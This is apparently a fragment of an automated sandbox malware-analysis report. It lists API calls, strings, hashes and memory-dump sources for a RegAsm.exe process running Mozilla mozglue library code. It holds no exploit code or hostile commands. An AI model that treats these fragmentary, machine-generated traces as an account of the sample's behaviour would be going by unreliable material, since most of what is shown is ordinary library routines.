                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6635BC
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6635E0
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C66363A
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663693
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6636CD
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663703
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C66373C
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663775
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C66378F
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663892
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6638BB
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663902
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663939
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663970
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6639EF
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663A26
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663AE5
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663E85
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663EBA
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663EE2
                                                                                                                                                          • Part of subcall function 6C666180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C6661DD
                                                                                                                                                          • Part of subcall function 6C666180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C66622C
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6640F9
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C66412F
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C664157
                                                                                                                                                          • Part of subcall function 6C666180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C666250
                                                                                                                                                          • Part of subcall function 6C666180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C666292
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C66441B
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C664448
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C66484E
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C664863
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C664878
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C664896
                                                                                                                                                        • free.MOZGLUE ref: 6C66489F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: floor$free$malloc$memcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3842999660-3916222277
                                                                                                                                                        • Opcode ID: 82ca2f26ba789d3a4865035a4c59b5273c3f58658a73f3eaa96036d8be530cf0
                                                                                                                                                        • Instruction ID: d8a16afc170ed66d1b9abdb641eccd9dea7c659fc409f5f0d77e2fcc755317dd
                                                                                                                                                        • Opcode Fuzzy Hash: 82ca2f26ba789d3a4865035a4c59b5273c3f58658a73f3eaa96036d8be530cf0
                                                                                                                                                        • Instruction Fuzzy Hash: 0CF26B74908B808FC325CF29C09469AFBF1FFCA318F118A5ED98997711DB719896CB46
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C6164DF
                                                                                                                                                        • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C6164F2
                                                                                                                                                        • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C616505
                                                                                                                                                        • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C616518
                                                                                                                                                        • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C61652B
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C61671C
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C616724
                                                                                                                                                        • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C61672F
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C616759
                                                                                                                                                        • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C616764
                                                                                                                                                        • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C616A80
                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C616ABE
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C616AD3
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C616AE8
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C616AF7
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                        • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                        • API String ID: 487479824-2878602165
                                                                                                                                                        • Opcode ID: 0332946844619abc9b63a4c2dea35825ae2b8417d825208aa18c559c2585c94d
                                                                                                                                                        • Instruction ID: 00c5d05f3d8ba90055b576cc7de497ccf551f8fc5a7bcc7cdbfc482d3f6875df
                                                                                                                                                        • Opcode Fuzzy Hash: 0332946844619abc9b63a4c2dea35825ae2b8417d825208aa18c559c2585c94d
                                                                                                                                                        • Instruction Fuzzy Hash: DBF1F7749092299FCB20CF29CC887DAB7B4EF46319F1441D8D809A7A41D731EE85CFA9
                                                                                                                                                        APIs
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66C5F9
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66C6FB
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C66C74D
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C66C7DE
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00004014), ref: 6C66C9D5
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66CC76
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C66CD7A
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66DB40
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C66DB62
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C66DB99
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66DD8B
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C66DE95
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C66E360
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66E432
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C66E472
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$memcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 368790112-0
                                                                                                                                                        • Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                                                                        • Instruction ID: fce22423478799b3d9314030f3ce4d70d12cfb984971d9c45271753439a165c5
                                                                                                                                                        • Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                                                                        • Instruction Fuzzy Hash: 0833CE71E0021ACFCB04CFA9C8806EDBBF2FF89304F284269D955ABB55D731A945CB95
                                                                                                                                                        APIs
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C62EE7A
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C62EFB5
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C631695
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6316B4
                                                                                                                                                        • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C631770
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C631A3E
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$freemallocmemcpy
                                                                                                                                                        • String ID: ~q`l$~q`l
                                                                                                                                                        • API String ID: 3693777188-2172191995
                                                                                                                                                        • Opcode ID: 5ec69ad484bef455736075df99c11f9ae6356a6589103ff6c253f2977bc89820
                                                                                                                                                        • Instruction ID: 9145da9a28d44fe5fa2e93d9e2e3e1e391448ef2f1747a65ae1c9d2c75ceeaa3
                                                                                                                                                        • Opcode Fuzzy Hash: 5ec69ad484bef455736075df99c11f9ae6356a6589103ff6c253f2977bc89820
                                                                                                                                                        • Instruction Fuzzy Hash: AEB32871E04229CFCB14CFA8C890ADDB7B2FF49304F2592A9D459AB745D730A986CF94
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E7B8), ref: 6C61FF81
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E7B8), ref: 6C62022D
                                                                                                                                                        • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C620240
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E768), ref: 6C62025B
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E768), ref: 6C62027B
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                        • API String ID: 618468079-3577267516
                                                                                                                                                        • Opcode ID: 69c5a24ff8df53208b5d324a901ff06407065411310e4e806ab4f3440bf936db
                                                                                                                                                        • Instruction ID: e6de1ecec401d8b79f3495975b43c019ef6e234036f3de0a82d11874fc45292b
                                                                                                                                                        • Opcode Fuzzy Hash: 69c5a24ff8df53208b5d324a901ff06407065411310e4e806ab4f3440bf936db
                                                                                                                                                        • Instruction Fuzzy Hash: B7C2E271A097418FD714CF28C490756BBE1BF86328F28C66DE46A8B795C775E801CF89
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00004014), ref: 6C66E811
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66EAA8
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C66EBD5
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66EEF6
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C66F223
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C66F322
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C670E03
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C670E54
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C670EAE
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C670ED4
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$memcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 368790112-0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C667770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(}>dl,?,?,?,6C643E7D,?,?), ref: 6C66777C
                                                                                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C643F17
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C643F5C
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C643F8D
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C643F99
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C643FA0
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C643FA7
                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C643FB4
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
                                                                                                                                                        • String ID: C>dl$nvd3d9wrap.dll$nvinit.dll
                                                                                                                                                        • API String ID: 1189858803-302148991
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E7B8), ref: 6C61FF81
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E7B8), ref: 6C62022D
                                                                                                                                                        • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C620240
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E768), ref: 6C62025B
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E768), ref: 6C62027B
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                                                                                                        • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                        • API String ID: 618468079-3566792288
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
                                                                                                                                                        • API String ID: 0-2712937348
                                                                                                                                                        APIs
                                                                                                                                                        • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C652ED3
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C652EE7
                                                                                                                                                        • MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6C652F0D
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C653214
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C653242
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6536BF
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: strlen$AddressCode$DescribeDetailsFormat
                                                                                                                                                        • String ID: MOZ_PROFILER_SYMBOLICATE$get $set
                                                                                                                                                        • API String ID: 2257098003-3318126862
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpystrlen
                                                                                                                                                        • String ID: (pre-xul)$data$name$schema$vhl
                                                                                                                                                        • API String ID: 3412268980-1044629247
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C63D1C5), ref: 6C62D4F2
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C63D1C5), ref: 6C62D50B
                                                                                                                                                          • Part of subcall function 6C60CFE0: EnterCriticalSection.KERNEL32(6C68E784), ref: 6C60CFF6
                                                                                                                                                          • Part of subcall function 6C60CFE0: LeaveCriticalSection.KERNEL32(6C68E784), ref: 6C60D026
                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C63D1C5), ref: 6C62D52E
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E7DC), ref: 6C62D690
                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C62D6A6
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E7DC), ref: 6C62D712
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C63D1C5), ref: 6C62D751
                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C62D7EA
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                        • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                        • API String ID: 2690322072-3894294050
                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 6C664EFF
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C664F2E
                                                                                                                                                        • moz_xmalloc.MOZGLUE ref: 6C664F52
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000), ref: 6C664F62
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6652B2
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6652E6
                                                                                                                                                        • Sleep.KERNEL32(00000010), ref: 6C665481
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C665498
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                         • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                                                                                        • String ID: (
                                                                                                                                                        • API String ID: 4104871533-3887548279
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C629EB8
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C629F24
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C629F34
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C62A823
                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C62A83C
                                                                                                                                                        • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C62A849
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                         • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
                                                                                                                                                        • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                        • API String ID: 2950001534-1351931279
                                                                                                                                                        APIs
                                                                                                                                                        • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C652C31
                                                                                                                                                        • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C652C61
                                                                                                                                                          • Part of subcall function 6C604DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C604E5A
                                                                                                                                                          • Part of subcall function 6C604DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C604E97
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C652C82
                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C652E2D
                                                                                                                                                          • Part of subcall function 6C6181B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C6181DE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                         • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                        • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                        • API String ID: 801438305-4149320968
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                         • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __aulldiv__aullrem
                                                                                                                                                        • String ID: -Infinity$NaN
                                                                                                                                                        • API String ID: 3839614884-2141177498
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                         • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: $-$0$0$1$8$9$@
                                                                                                                                                        • API String ID: 0-3654031807
                                                                                                                                                        APIs
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6C678A4B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                         • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset
                                                                                                                                                        • String ID: ~q`l
                                                                                                                                                        • API String ID: 2221118986-3731770368
                                                                                                                                                        APIs
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6C6788F0
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C67925C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                         • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                         • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset
                                                                                                                                                        • String ID: ~q`l
                                                                                                                                                        • API String ID: 2221118986-3731770368
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __aulldiv$__aullrem
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2022606265-0
                                                                                                                                                        • Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                                                                                                        • Instruction ID: 8f3689bea2474adecbbada4f8cef6c21ed77366f3c595d22d6d97c74ead535f2
                                                                                                                                                        • Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                                                                                                        • Instruction Fuzzy Hash: 5F320432B146119FC71CDE2CC890656BBE6AFC9310F09866DE89ADB395D730ED05CB91
                                                                                                                                                        APIs
                                                                                                                                                        • InitializeConditionVariable.KERNEL32(?), ref: 6C646D45
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C646E1E
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4169067295-0
